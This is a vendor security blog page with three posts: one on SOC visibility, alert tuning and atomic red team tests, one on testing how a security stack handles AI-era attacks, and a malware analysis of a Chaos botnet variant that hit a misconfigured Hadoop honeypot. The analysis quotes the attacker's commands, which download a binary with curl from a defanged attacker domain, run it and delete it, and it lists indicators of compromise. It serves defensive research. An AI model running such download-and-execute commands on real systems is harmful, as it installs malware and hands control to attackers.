Blog
/
/
March 4, 2019

The VR Goldilocks Problem and Value of Continued Recognition

Security and Operations Teams face challenges when it comes to visibility and recognition. Learn more about how we find a solution to the problems!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
04
Mar 2019

First, some context about VR

Security Operations teams face two fundamental challenges when it comes to 'finding bad'.

The first is gaining and maintaining appropriate visibility into what is happening in our environments. Visibility is provided through data (e.g. telemetry, logs). The trinity of data sources for visibility concern accounts/credentials, devices, and network traffic.

The second challenge is getting good recognition within the scope of what is visible. Recognition is fundamentally about what alerting and workflows you can implement and automate in response to activity that is suspicious or malicious.

Visibility and Recognition each have their own different associated issues.

Visibility is a problem about what is and can be generated and either read as telemetry, or logged and stored locally, or shipped to a central platform. The timelines and completeness of what visibility you have can depend on factors such as how much data you can or can't store locally on devices that generate data - and for how long; what your data pipeline and data platform look like (e.g. if you are trying to centralise data for analysis); or the capability of host software agents you have to process certain information locally.

The constraints on visibility sets the bar for factors like coverage, timelines and completeness of what recognition you can achieve. Without visibility, we cannot recognize at all. With limited visibility, what we can recognize may not have much value. With the right visibility, we can still fail to recognise the right things. And with too much recognition, we can quickly overload our senses.

A good example of a technology that offers the opportunity to solve these challenges at the network layer is Darktrace. Their technology provides visibility, from a network traffic perspective, into data that concerns devices and the accounts/credentials associated with them. They then provide recognition on top of this by using Machine Learning (ML) models for anomaly detection. Their models alert on a wide range of activities that may be indicative of threat activity, (e.g. malware execution and command and control, a technical exploit, data exfiltration and so on).

The major advantage they provide, compared to traditional Intrusion Detection Systems (IDS) and other vendors who also use ML for network anomaly detection, is that you can a) adjust the sensitivity of their algorithms and b) build your own recognition for particular patterns of interest. For example, if you want to monitor what connections are made to one or two servers, you can set up alerts for any change to expected patterns. This means you can create and adjust custom recognition based on your enterprise context and tune it easily in response to how context changes over time.

The Goldilocks VR Matrix

Below is what we call the VR Goldilocks Matrix at PBX Group Security. We use it to assess technology, measure our own capability and processes, and ask ourselves hard questions about where we need to focus to get the most value from our budget, (or make cuts / shift investment) if we need to.

In the squares are some examples of what you (maybe) should think about doing if you find yourself there.

Important questions to ask about VR

One of the things about Visibility and Recognition is that it’s not a given they are ‘always on’. Sometimes there are failure modes for visibility (causing a downstream issue with recognition). And sometimes there are failure modes or conditions under which you WANT to pause recognition.

The key questions you must have answers to about this include:

  • Under what conditions might I lose visibility?
  • How would I know if I have?
  • Is that loss a blind spot (i.e. data is lost for a given time period)…
  • …or is it 'a temporal delay’ (e.g. a connection fails and data is batched for moving from A to B but that doesn’t happen for a few hours)?
  • What are the recognitions that might be impacted by either of the above?
  • What is my expectation for the SLA on those recognitions from ‘cause of alert’ to ‘response workflow’?
  • Under what conditions would I be willing to pause recognition, change the workflow for what happens upon recognition, or stop it all together?
  • What is the stacked ranked list of ‘must, should, could’ for all recognition and why?

Alerts. Alerts everywhere.

More often than not, Security Operations teams suffer the costs of wasted time due to noisy alerts from certain data sources. As a consequence, it's more difficult for them to single out malicious behavior as suspicious or benign. The number of alerts that are generated due to out of the box SIEM platform configurations for sources like Web Proxies and Domain Controllers are often excessive, and the cost to tune those rules can also be unpalatable. Therefore, rather than trying to tune alerts, teams might make a call to switch them off until someone can get around to figuring out a better way. There’s no use having hypothetical recognition, but no workflow to act on what is generate (other than compliance).

This is where technologies that use ML can help. There are two basic approaches...

One is to avoid alerting until multiple conditions are met that indicate a high probability of threat activity. In this scenario, rather than alerting on the 1st, 2nd, 3rd and 4th ‘suspicious activities’, you wait until you have a critical mass of indicators, and then you generate one high fidelity alert that has a much greater weighting to be malicious. This requires both a high level of precision and accuracy in alerting, and naturally some trade off in the time that can pass before an alert for malicious activity is generated.

The other is to alert on ‘suspicious actives 1-4' and let an analyst or automated process decide if this merits further investigation. This approach sacrifices accuracy for precision, but provides rapid context on whether one, or multiple, conditions are met that push the machine(s) up the priority list in the triage queue. To solve for the lower level of accuracy, this approach can make decisions about how long to sustain alerting. For example, if a host triggers multiple anomaly detection models, rather than continue to send alerts (and risk the SOC deciding to turn them off), the technology can pause alerts after a certain threshold. If a machine has not been quarantined or taken off the network after 10 highly suspicious behaviors are flagged, there is a reasonable assumption that the analyst will have dug into these and found the activity is legitimate.

Punchline 1: the value of Continued Recognition even when 'not malicious'

The topic of paused detections was raised after a recent joint exercise between PBX Group Security and Darktrace in testing Darktrace’s recognition. After a machine being used by the PBX Red Team breached multiple high priority models on Darktrace, the technology stopped alerting on further activity. This was because the initial alerts would have been severe enough to trigger a SOC workflow. This approach is designed to solve the problem of alert overload on a machine that is behaving anomalously but is not in fact malicious. Rather than having the SOC turn off alerts for that machine (which could later be used maliciously), the alerts are paused.

One of the outcomes of the test was that the PBX Detect team advised they would still want those alerts to exist for context to see what else the machine does (i.e. to understand its pattern of life). Now, rather than pausing alerts, Darktrace is surfacing this to customers to show where a rule is being paused and create an option to continue seeing alerts for a machine that has breached multiple models.

Which leads us on to our next point…

Punchline 2: the need for Atomic Tests for detection

Both Darktrace and Photobox Security are big believers in Atomic Red Team testing, which involves ‘unit tests’ that repeatedly (or at a certain frequency) test a detection using code. Unit tests automate the work of Red Teams when they discovery control strengths (which you want to monitor continuously for uptime) or control gaps (which you want to monitor for when they are closed). You could design atomic tests to launch a series of particular attacks / threat actor actions from one machine in a chained event. Or you could launch different discreet actions from different machines, each of which has no prior context for doing bad stuff. This allows you to scale the sample size for testing what recognition you have (either through ML or more traditional SIEM alerting). Doing this also means you don't have to ask Red Teams to repeat the same tests again, allowing them to focus on different threat paths to achieve objectives.

Mitre Att&ck is an invaluable framework for this. Many vendors are now aligning to Att&ck to show what they can recognize relating to attack TTPs (Tools, Tactics and Procedures). This enables security teams to map what TTPs are relevant to them (e.g. by using threat intel about the campaigns of threat actor groups that are targeting them). Atomic Red Team tests can then be used to assure that expected detections are operational or find gaps that need closing.

If you miss detections, then you know you need to optimise the recognition you have. If you get too many recognitions outside of the atomic test conditions, you either have to accept a high false positive rate because of the nature of the network, or you can tune your detection sensitivity. The opportunities to do this with technology based on ML and anomaly detection are significant, because you can quickly see for new attack types what a unit test tells you about your current detections and that coverage you think you have is 'as expected'.

Punchline 3: collaboration for the win

Using well-structured Red Team exercises can help your organisation and your technology partners learn new things about how we can collectively find and halt evil. They can also help defenders learn more about good assumptions to build into ML models, as well as covering edge cases where alerts have 'business intelligence' value vs ‘finding bad’.

If you want to understand the categorisations of ways that your populations of machines act over time, there is no better way to do it than through anomaly detection and feeding alerts into a system that supports SOC operations as well as knowledge management (e.g. a graph database).

Working like this means that we also help get the most out of the visibility and recognition we have. Security solutions can be of huge help to Network and Operations teams for troubleshooting or answering questions about network architecture. Often, it’s just a shift in perspective that unlocks cross-functional value from investments in security tech and process. Understanding that recognition doesn’t stop with security is another great example of where technologies that let you build your own logic into recognition can make a huge difference above protecting the bottom line, to adding top line value.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO

More in this series

No items found.

Blog

/

AI

/

April 8, 2026

How to Secure AI and Find the Gaps in Your Security Operations

secuing AI testing gaps security operationsDefault blog imageDefault blog image

What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint, strains that outpace signature‑first thinking.  

You can stay up to date on attacker behavior by signing up for our newsletter where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email—so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)  
  1. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures—reducing dwell time in fast exploitation windows.  
  1. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows—buying analysts time to investigate with full context. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)  
  1. Investigation workflows that assume AI is in the loop—for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  1. Who did it?
  1. Why did they do it?
  1. How did they do it?
  1. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Security markets tend to follow a familiar pattern. New technologies drive an initial wave of specialized tools (posture, governance, observability) each focused on a specific part of the problem. Over time, those capabilities consolidate as organizations realize the new challenge is coordination.

AI is accelerating the shift of focus to coordination because AI-powered attackers can move faster and operate across more systems at once. Recent exploitation waves show exactly this. Adversaries can operationalize new techniques and move across domains, turning small gaps into full attack paths.

Anticipate a continued move toward more integrated security models because fragmented approaches can’t keep up with the speed and interconnected nature of modern attacks.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  1. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes.

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  1. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlights why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.  

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  1. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  1. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  1. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, behaving “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  1. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align.

Final takeaway

Security teams should ask be focused on how their stack operates as one system before AI amplifies pressure on every seam.

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

Continue reading
About the author
Nabil Zoldjalali
VP, Field CISO

Blog

/

/

April 7, 2026

Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud

Chaos Malware Variant Exploiting Misconfigurations in the CloudDefault blog imageDefault blog image

Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

One example of software targeted within Darktrace’s honeypots is Hadoop, an open-source framework developed by Apache that enables the distributed processing of large data sets across clusters of computers. In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. In one example from March 2026, this enabled Darktrace to identify and further investigate activity linked to Chaos malware.

What is Chaos Malware?

First discovered by Lumen’s Black Lotus Labs, Chaos is a Go-based malware [1]. It is speculated to be of Chinese origin, based on Chinese language characters found within strings in the sample and the presence of zh-CN locale indicators. Based on code overlap, Chaos is likely an evolution of the Kaiji botnet.

Chaos has historically targeted routers and primarily spreads through SSH brute-forcing and known Common Vulnerabilities and Exposures (CVEs) in router software. It then utilizes infected devices as part of a Distributed Denial-of-Service (DDoS) botnet, as well as cryptomining.

Darktrace’s view of a Chaos Malware Compromise

The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.

The initial infection being delivered to the unsecured endpoint.
Figure 1: The initial infection being delivered to the unsecured endpoint.

This defines a new application with an initial command to run inside the container, specified in the command field of the am-container-spec section. This, in turn, initiates several shell commands:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - sets permissions to allow all users to read, write, and execute the malware.
  • ./7c49006c2e417f20c732409ead2d6cc0. - executes the malware
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - deletes the malware file from the disk to reduce traces of activity.

In practice, once this application is created an attacker-defined binary is downloaded from their server, executed on the system, and then removed to prevent forensic recovery. The domain pan.tenire[.]com has been previously observed in another campaign, dubbed “Operation Silk Lure”, which delivered the ValleyRAT Remote Access Trojan (RAT) via malicious job application resumes. Like Chaos, this campaign featured extensive Chinese characters throughout its stages, including within the fake resume themselves. The domain resolves to 107[.]189.10.219, a virtual private server (VPS) hosted in BuyVM’s Luxembourg location, a provider known for offering low-cost VPS services.

Analysis of the updated Chaos malware sample

Chaos has historically targeted routers and other edge devices, making compromises of Linux server environments a relatively new development. The sample observed by Darktrace in this compromise is a 64-bit ELF binary, while the majority of router hardware typically runs on ARM, MIPS, or PowerPC architecture and often 32-bit.

The malware sample used in the attack has undergone notable restructuring compared to earlier versions. The default namespace has been changed from “main_chaos” to just “main”, and several functions have been reworked. Despite these changes, the sample retains its core features, including persistence mechanisms established via systemd and a malicious keep-alive script stored at /boot/system.pub.

The creation of the systemd persistence service.
Figure 2: The creation of the systemd persistence service.

Likewise, the functions to perform DDoS attacks are still present, with methods that target the following protocols:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

However, several features such as the SSH spreader and vulnerability exploitation functions appear to have been removed. In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.

A new function of the malware is a SOCKS proxy. When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy. This enables the attacker to route their traffic via the compromised server and use it as a proxy. This capability offers several advantages: it enables the threat actor to launch attacks from the victim’s internet connection, making the activity appear to originate from the victim instead of the attacker, and it allows the attacker to pivot into internal networks only accessible from the compromised server.

The command processor for StartProxy. Due to endianness, the string is reversed.
Figure 3: The command processor for StartProxy. Due to endianness, the string is reversed.

In previous cases, other DDoS botnets, such as Aisuru, have been observed pivoting to offer proxying services to other cybercriminals. The creators of Chaos may have taken note of this trend and added similar functionality to expand their monetization options and enhance the capabilities of their own botnet, helping ensure they do not fall behind competing operators.

The sample contains an embedded domain, gmserver.osfc[.]org[.]cn, which it uses to resolve the IP of its C2 server.  At time or writing, the domain resolves to 70[.]39.181.70, an IP owned by NetLabel Global which is geolocated at Hong Kong.

Historically, the domain has also resolved to 154[.]26.209.250, owned by Kurun Cloud, a low-cost VPS provider that offers dedicated server rentals. The malware uses port 65111 for sending and receiving commands, although neither IP appears to be actively accepting connections on this port at the time of writing.

Key takeaways

While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. Previously reported versions of Chaos malware already featured the ability to exploit a wide range of router CVEs, and its recent shift towards targeting Linux cloud-server vulnerabilities will further broaden its reach.

It is therefore important that security teams patch CVEs and ensure strong security configuration for applications deployed in the cloud, particularly as the cloud market continues to grow rapidly while available security tooling struggles to keep pace.

The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams. Proxies enable attackers to bypass rate limits and mask their tracks, enabling more complex forms of cybercrime while making it significantly harder for defenders to detect and block malicious campaigns.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Indicators of Compromise (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos Malware hash

182[.]90.229.95 - Attacker IP

pan.tenire[.]com (107[.]189.10.219) - Server hosting malicious binaries

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - Attacker C2 Server

References

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI